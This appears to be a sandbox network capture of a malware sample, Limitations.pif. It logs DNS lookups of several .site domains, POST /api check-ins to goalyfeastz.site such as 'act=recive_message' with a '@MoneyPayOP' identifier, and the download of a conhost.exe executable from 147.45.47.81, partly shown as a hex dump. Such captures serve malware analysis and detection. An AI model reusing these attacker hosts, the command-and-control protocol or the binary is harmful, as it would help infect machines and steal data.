                                                              Oct 30, 2024 15:44:46.270078897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270085096 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270131111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270164013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270172119 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270215034 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270246983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270256042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270281076 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270314932 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270334959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270349026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270382881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270386934 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270416975 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270451069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270477057 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270484924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270518064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270526886 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270566940 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270602942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270610094 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270663977 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270786047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270826101 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270864964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270900011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270944118 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270951986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270986080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271028042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271038055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271070004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271119118 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271122932 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271157026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271189928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271203041 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271223068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271259069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271264076 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271291018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271333933 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271343946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271377087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271409988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271431923 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271444082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271477938 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271485090 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271512032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271547079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271549940 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271754026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271787882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271791935 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271838903 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271878004 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271888018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271923065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271955967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.271961927 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.271990061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272022963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272026062 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.272058010 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272089958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272095919 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.272125959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272161007 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272164106 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.272274017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272306919 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272311926 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.272341013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.272381067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.279985905 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.281465054 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:45:01.360639095 CET4999580192.168.2.6147.45.47.81
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 30, 2024 15:42:18.679521084 CET5199653192.168.2.61.1.1.1
                                                              Oct 30, 2024 15:42:18.695445061 CET53519961.1.1.1192.168.2.6
                                                              Oct 30, 2024 15:44:31.098505974 CET5090153192.168.2.61.1.1.1
                                                              Oct 30, 2024 15:44:31.342497110 CET53509011.1.1.1192.168.2.6
                                                              Oct 30, 2024 15:44:31.349697113 CET6064053192.168.2.61.1.1.1
                                                              Oct 30, 2024 15:44:31.359283924 CET53606401.1.1.1192.168.2.6
                                                              Oct 30, 2024 15:44:31.363807917 CET5763253192.168.2.61.1.1.1
                                                              Oct 30, 2024 15:44:31.374382019 CET53576321.1.1.1192.168.2.6
                                                              Oct 30, 2024 15:44:31.379405022 CET6460253192.168.2.61.1.1.1
                                                              Oct 30, 2024 15:44:31.394373894 CET53646021.1.1.1192.168.2.6
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 30, 2024 15:42:18.679521084 CET192.168.2.61.1.1.10x1fa0Standard query (0)IPhwvmMSERoGGfvkQaPBYqP.IPhwvmMSERoGGfvkQaPBYqPA (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.098505974 CET192.168.2.61.1.1.10x935Standard query (0)servicedny.siteA (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.349697113 CET192.168.2.61.1.1.10x35edStandard query (0)seallysl.siteA (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.363807917 CET192.168.2.61.1.1.10xbc7fStandard query (0)opposezmny.siteA (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.379405022 CET192.168.2.61.1.1.10x75e8Standard query (0)goalyfeastz.siteA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 30, 2024 15:42:18.695445061 CET1.1.1.1192.168.2.60x1fa0Name error (3)IPhwvmMSERoGGfvkQaPBYqP.IPhwvmMSERoGGfvkQaPBYqPnonenoneA (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.342497110 CET1.1.1.1192.168.2.60x935Name error (3)servicedny.sitenonenoneA (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.359283924 CET1.1.1.1192.168.2.60x35edName error (3)seallysl.sitenonenoneA (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.374382019 CET1.1.1.1192.168.2.60xbc7fName error (3)opposezmny.sitenonenoneA (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.394373894 CET1.1.1.1192.168.2.60x75e8No error (0)goalyfeastz.site172.67.145.203A (IP address)IN (0x0001)false
                                                              Oct 30, 2024 15:44:31.394373894 CET1.1.1.1192.168.2.60x75e8No error (0)goalyfeastz.site104.21.33.140A (IP address)IN (0x0001)false
                                                              • goalyfeastz.site
                                                              • 147.45.47.81
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.649995147.45.47.81801832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              Oct 30, 2024 15:44:43.758893013 CET198OUTGET /conhost.exe HTTP/1.1
                                                              Connection: Keep-Alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Host: 147.45.47.81
                                                              Oct 30, 2024 15:44:45.257751942 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.18.0 (Ubuntu)
                                                              Date: Wed, 30 Oct 2024 14:44:44 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 3125704
                                                              Last-Modified: Tue, 20 Aug 2024 12:02:17 GMT
                                                              Connection: keep-alive
                                                              ETag: "66c485c9-2fb1c8"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                              Data Ascii: MZ`@`!L!Require Windows$PEL?O_@X00Nu/<l.text `.rdata;<@@.dataM@.rsrcN0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                              Oct 30, 2024 15:44:45.257778883 CET1236INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                              Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3D$tlA
                                                              Oct 30, 2024 15:44:45.257793903 CET1236INData Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5
                                                              Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
                                                              Oct 30, 2024 15:44:45.257882118 CET1236INData Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c
                                                              Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
                                                              Oct 30, 2024 15:44:45.257901907 CET448INData Raw: a2 41 00 8b f8 3b fe 74 33 56 6a 01 6a 01 57 ff 15 a4 a2 41 00 56 56 56 8d 45 e4 50 ff 15 a8 a2 41 00 8d 45 e4 50 ff 15 ac a2 41 00 6a 01 57 ff 15 b0 a2 41 00 57 ff 15 b4 a2 41 00 5f 5e c9 c3 53 ff 74 24 08 ff 15 94 a2 41 00 8b d8 85 db 75 02 5b
                                                              Data Ascii: A;t3VjjWAVVVEPAEPAjWAWA_^St$Au[VW|$Wt$A5AWSWS_3^@[UDSVWjpA5XAAPuuSuhuuSt&utWS\AWS`AtPdAz=Auo5h
                                                              Oct 30, 2024 15:44:45.257924080 CET1236INData Raw: 6a 18 ff 75 08 ff 15 40 a0 41 00 57 53 ff 75 d8 ff d6 57 53 ff 75 dc 89 45 f4 ff d6 ff 75 fc 8b 35 18 a0 41 00 89 45 f8 ff d6 ff 75 fc 8b d8 ff d6 ff 75 08 8b 35 38 a0 41 00 53 8b f8 ff d6 ff 75 f8 89 45 f0 ff 75 f4 ff 75 fc ff 15 34 a0 41 00 50
                                                              Data Ascii: ju@AWSuWSuEu5AEuu58ASuEuu4APWjWE<Ah u3uPPSuuPPW,AjW(AuESuW5$ASWujAEuWAWWWWuTA_^[UhSVWj@EPuA-h
                                                              Oct 30, 2024 15:44:45.257936954 CET1236INData Raw: 83 25 84 e9 41 00 00 c3 83 25 84 e9 41 00 00 68 60 a6 41 00 68 c4 a5 41 00 ff 15 68 a1 41 00 50 ff 15 6c a1 41 00 85 c0 74 11 68 88 e9 41 00 ff d0 c7 05 84 e9 41 00 01 00 00 00 c3 56 8b 74 24 08 85 f6 75 05 33 c0 40 5e c3 e8 3f ff ff ff 83 f8 09
                                                              Data Ascii: %A%Ah`AhAhAPlAthAAVt$u3@^?uuu@;t3^US3EPSSSSSSh j jEP]]]]]]]EAtEPuSAuAE[UEVpEtKQ;SW}=3~'4<
                                                              Oct 30, 2024 15:44:45.257950068 CET1236INData Raw: 5e c2 04 00 53 56 8b f1 8b 06 33 db 57 8b 7c 24 10 89 5e 04 88 18 38 1f 74 07 43 80 3c 3b 00 75 f9 53 e8 33 fc ff ff 8b 06 8a 0f 88 08 40 47 84 c9 75 f6 5f 89 5e 04 8b c6 5e 5b c2 04 00 56 57 8b 7c 24 0c 8b f1 3b fe 74 25 83 66 04 00 8b 06 c6 00
                                                              Data Ascii: ^SV3W|$^8tC<;uS3@Gu_^^[VW|$;t%fw@AuGF_^Vj&NT$FF^SVW|$38tC<;uSF@Gu^_^[VW|$wF@A
                                                              Oct 30, 2024 15:44:45.257963896 CET1236INData Raw: 8d 45 f4 50 e8 46 fd ff ff 83 c4 0c 80 7d 10 00 5f 5e ff 75 f4 75 14 ff 35 80 e0 41 00 6a 0b 6a 00 e8 61 65 00 00 83 c4 10 eb 0c 6a 20 6a 00 e8 53 65 00 00 83 c4 0c ff 75 f4 e8 ac 61 01 00 ff 75 e8 e8 a4 61 01 00 59 32 c0 59 c9 c3 55 8b ec 83 ec
                                                              Data Ascii: EPF}_^uu5Ajjaej jSeuauaY2YU4VWME0>fS^f~Ff=xufS1Y|[PMMjEPEPPMu&aYEPMkuauaYYKFf=X
                                                              Oct 30, 2024 15:44:45.257977962 CET448INData Raw: 61 04 00 00 57 ff d6 ff 75 dc e8 08 5d 01 00 ff 75 e8 e8 00 5d 01 00 59 59 8b c7 e9 18 ff ff ff 55 8b ec 51 53 56 57 8b 3d 28 a1 41 00 6a 01 8d 45 fc 50 ff 75 0c ff d7 8b 75 08 8b ce 8b d8 e8 54 df ff ff 8d 43 02 50 8b ce 89 45 08 e8 fb f4 ff ff
                                                              Data Ascii: aWu]u]YYUQSVW=(AjEPuuTCPECSuPu>Wf$GYF_^[Vj\Ytt$3P.^UVF9EW~EMyt5WEPe3~MSUfBf@AA;|[~
                                                              Oct 30, 2024 15:44:45.257992983 CET1236INData Raw: 8d 4d a4 e8 d0 dd ff ff 8d 4d b0 e8 c8 dd ff ff 8b 4d fc 8b 07 89 4d f8 8d 34 08 8d 4d d4 e8 e3 f3 ff ff 8a 0e 33 db eb 14 80 f9 3d 74 1d ff 75 f4 8d 4d d4 e8 d5 f4 ff ff 43 8a 0c 1e 8a c1 88 4d f4 e8 57 e7 ff ff 84 c0 74 de 68 e9 fd 00 00 8d 45
                                                              Data Ascii: MMMM4M3=tuMCMWthEPEP^PMuZuZYY ]M M<=EMu<"t<-uulYFYuE0AFe
                                                              Oct 30, 2024 15:44:45.258137941 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.18.0 (Ubuntu)
                                                              Date: Wed, 30 Oct 2024 14:44:44 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 3125704
                                                              Last-Modified: Tue, 20 Aug 2024 12:02:17 GMT
                                                              Connection: keep-alive
                                                              ETag: "66c485c9-2fb1c8"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                              Data Ascii: MZ`@`!L!Require Windows$PEL?O_@X00Nu/<l.text `.rdata;<@@.dataM@.rsrcN0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.649985172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:32 UTC263OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 8
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                              Data Ascii: act=life
                                                              2024-10-30 14:44:32 UTC1009INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:32 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=1likmkranm78d8c9n8lpb9n4nv; expires=Sun, 23 Feb 2025 08:31:11 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fwa5SFEv31OSQDHCR%2Bv9kvMLbBBrdPCIqcj15XaLVUUl7hJENm7InoxEhZ3leGXaVbmp%2FoWJrMib5Yj%2FVlv1PnN0ueKiXy7G6OMuHe9tLQknu8%2FOtmzTlo1MlsAezzcvG5GE"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f14eb4c4796-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1986282&cwnd=244&unsent_bytes=0&cid=a5e734850affe75c&ts=506&x=0"
                                                              2024-10-30 14:44:32 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                              Data Ascii: 2ok
                                                              2024-10-30 14:44:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.649986172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:33 UTC264OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 85
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:33 UTC85OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65 79 50 61 79 4f 50 26 6a 3d 37 63 32 36 33 33 35 37 64 30 34 61 66 66 34 37 33 63 62 32 65 64 61 38 61 34 32 66 66 30 33 33
                                                              Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@MoneyPayOP&j=7c263357d04aff473cb2eda8a42ff033
                                                              2024-10-30 14:44:33 UTC1013INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:33 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=1t6rookb1p6thbpt4t37rm4f2l; expires=Sun, 23 Feb 2025 08:31:12 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ze9c3vTLnSgtpAmqMNAgLu58%2FY%2BDDfPjcCfgFuEbA7o7asxr64ZlewtHsW64kH1z3DBJGlw%2BbdGPsm0twXWJTSlRqNJraG3ojL%2Bf%2Fm%2BqEnPCnf7EwtfKOgnH2Dji6DMaCgPl"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f1bdb70b787-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=985&delivery_rate=1626052&cwnd=106&unsent_bytes=0&cid=edc03339c9dc3393&ts=481&x=0"
                                                              2024-10-30 14:44:33 UTC356INData Raw: 34 32 36 38 0d 0a 78 65 78 38 71 31 46 77 31 2b 62 6c 33 2f 61 46 7a 4f 55 54 46 62 35 68 55 6d 49 66 77 63 78 4f 46 4e 32 77 45 42 37 63 47 72 57 2b 7a 67 71 4a 61 30 54 37 78 4a 61 36 31 4c 2b 71 68 48 39 6d 32 30 31 77 41 33 76 6a 39 69 68 31 73 63 4e 31 4d 76 35 73 32 4f 66 57 47 73 6f 39 41 37 4c 4b 78 37 71 4f 70 2f 61 2b 61 44 66 62 44 33 42 59 50 61 53 6d 4c 48 57 78 30 6e 46 31 73 32 72 5a 70 6f 51 51 7a 44 6b 56 74 49 4b 45 73 35 76 67 71 59 42 79 66 39 41 49 50 77 70 79 34 2b 42 73 63 61 65 53 4b 6a 79 52 66 38 47 6b 6f 52 33 59 4f 6c 4b 71 79 70 37 39 6b 2b 76 75 33 7a 46 30 32 77 4d 2b 42 48 75 71 70 43 5a 38 75 64 4e 30 64 4b 78 7a 30 36 32 45 48 73 38 34 48 37 32 57 69 62 6d 63 36 36 2b 4b 63 6a 65 53 51 7a 63 59 50 66 76 75 66 30 53 38 77
                                                              Data Ascii: 4268xex8q1Fw1+bl3/aFzOUTFb5hUmIfwcxOFN2wEB7cGrW+zgqJa0T7xJa61L+qhH9m201wA3vj9ih1scN1Mv5s2OfWGso9A7LKx7qOp/a+aDfbD3BYPaSmLHWx0nF1s2rZpoQQzDkVtIKEs5vgqYByf9AIPwpy4+BscaeSKjyRf8GkoR3YOlKqyp79k+vu3zF02wM+BHuqpCZ8udN0dKxz062EHs84H72Wibmc66+KcjeSQzcYPfvuf0S8w
                                                              2024-10-30 14:44:33 UTC1369INData Raw: 69 45 6c 62 57 66 37 4b 75 56 65 6e 37 52 44 6a 41 4e 64 36 79 74 4c 48 47 31 32 48 31 32 75 6e 58 61 6f 59 34 65 69 58 31 53 73 70 7a 48 35 64 54 45 71 35 64 32 65 38 70 42 43 6b 42 69 37 62 64 73 63 62 4f 53 4b 6a 79 32 66 64 53 6b 68 52 48 4b 4f 78 6d 6e 68 4a 57 37 6d 65 4b 38 67 58 52 35 31 67 41 69 43 6e 4f 6c 72 53 56 39 74 74 64 31 65 50 34 32 6c 36 43 57 58 70 46 7a 4d 37 69 50 69 37 65 44 35 2b 36 59 50 32 36 63 42 44 78 41 4a 65 4f 71 4c 58 4b 2b 31 6e 78 79 75 6e 54 52 71 59 4d 52 7a 7a 6b 53 73 6f 36 50 74 5a 58 71 70 59 68 78 63 74 45 48 4e 67 78 38 70 75 35 69 4e 72 6a 4b 4d 69 54 2b 56 74 43 6b 6e 46 7a 38 4d 42 79 37 67 35 48 39 69 36 6d 33 78 33 5a 37 6e 46 74 77 44 6e 69 73 76 43 31 6b 75 74 78 67 63 4c 74 2b 32 71 53 41 48 73 77 30 48
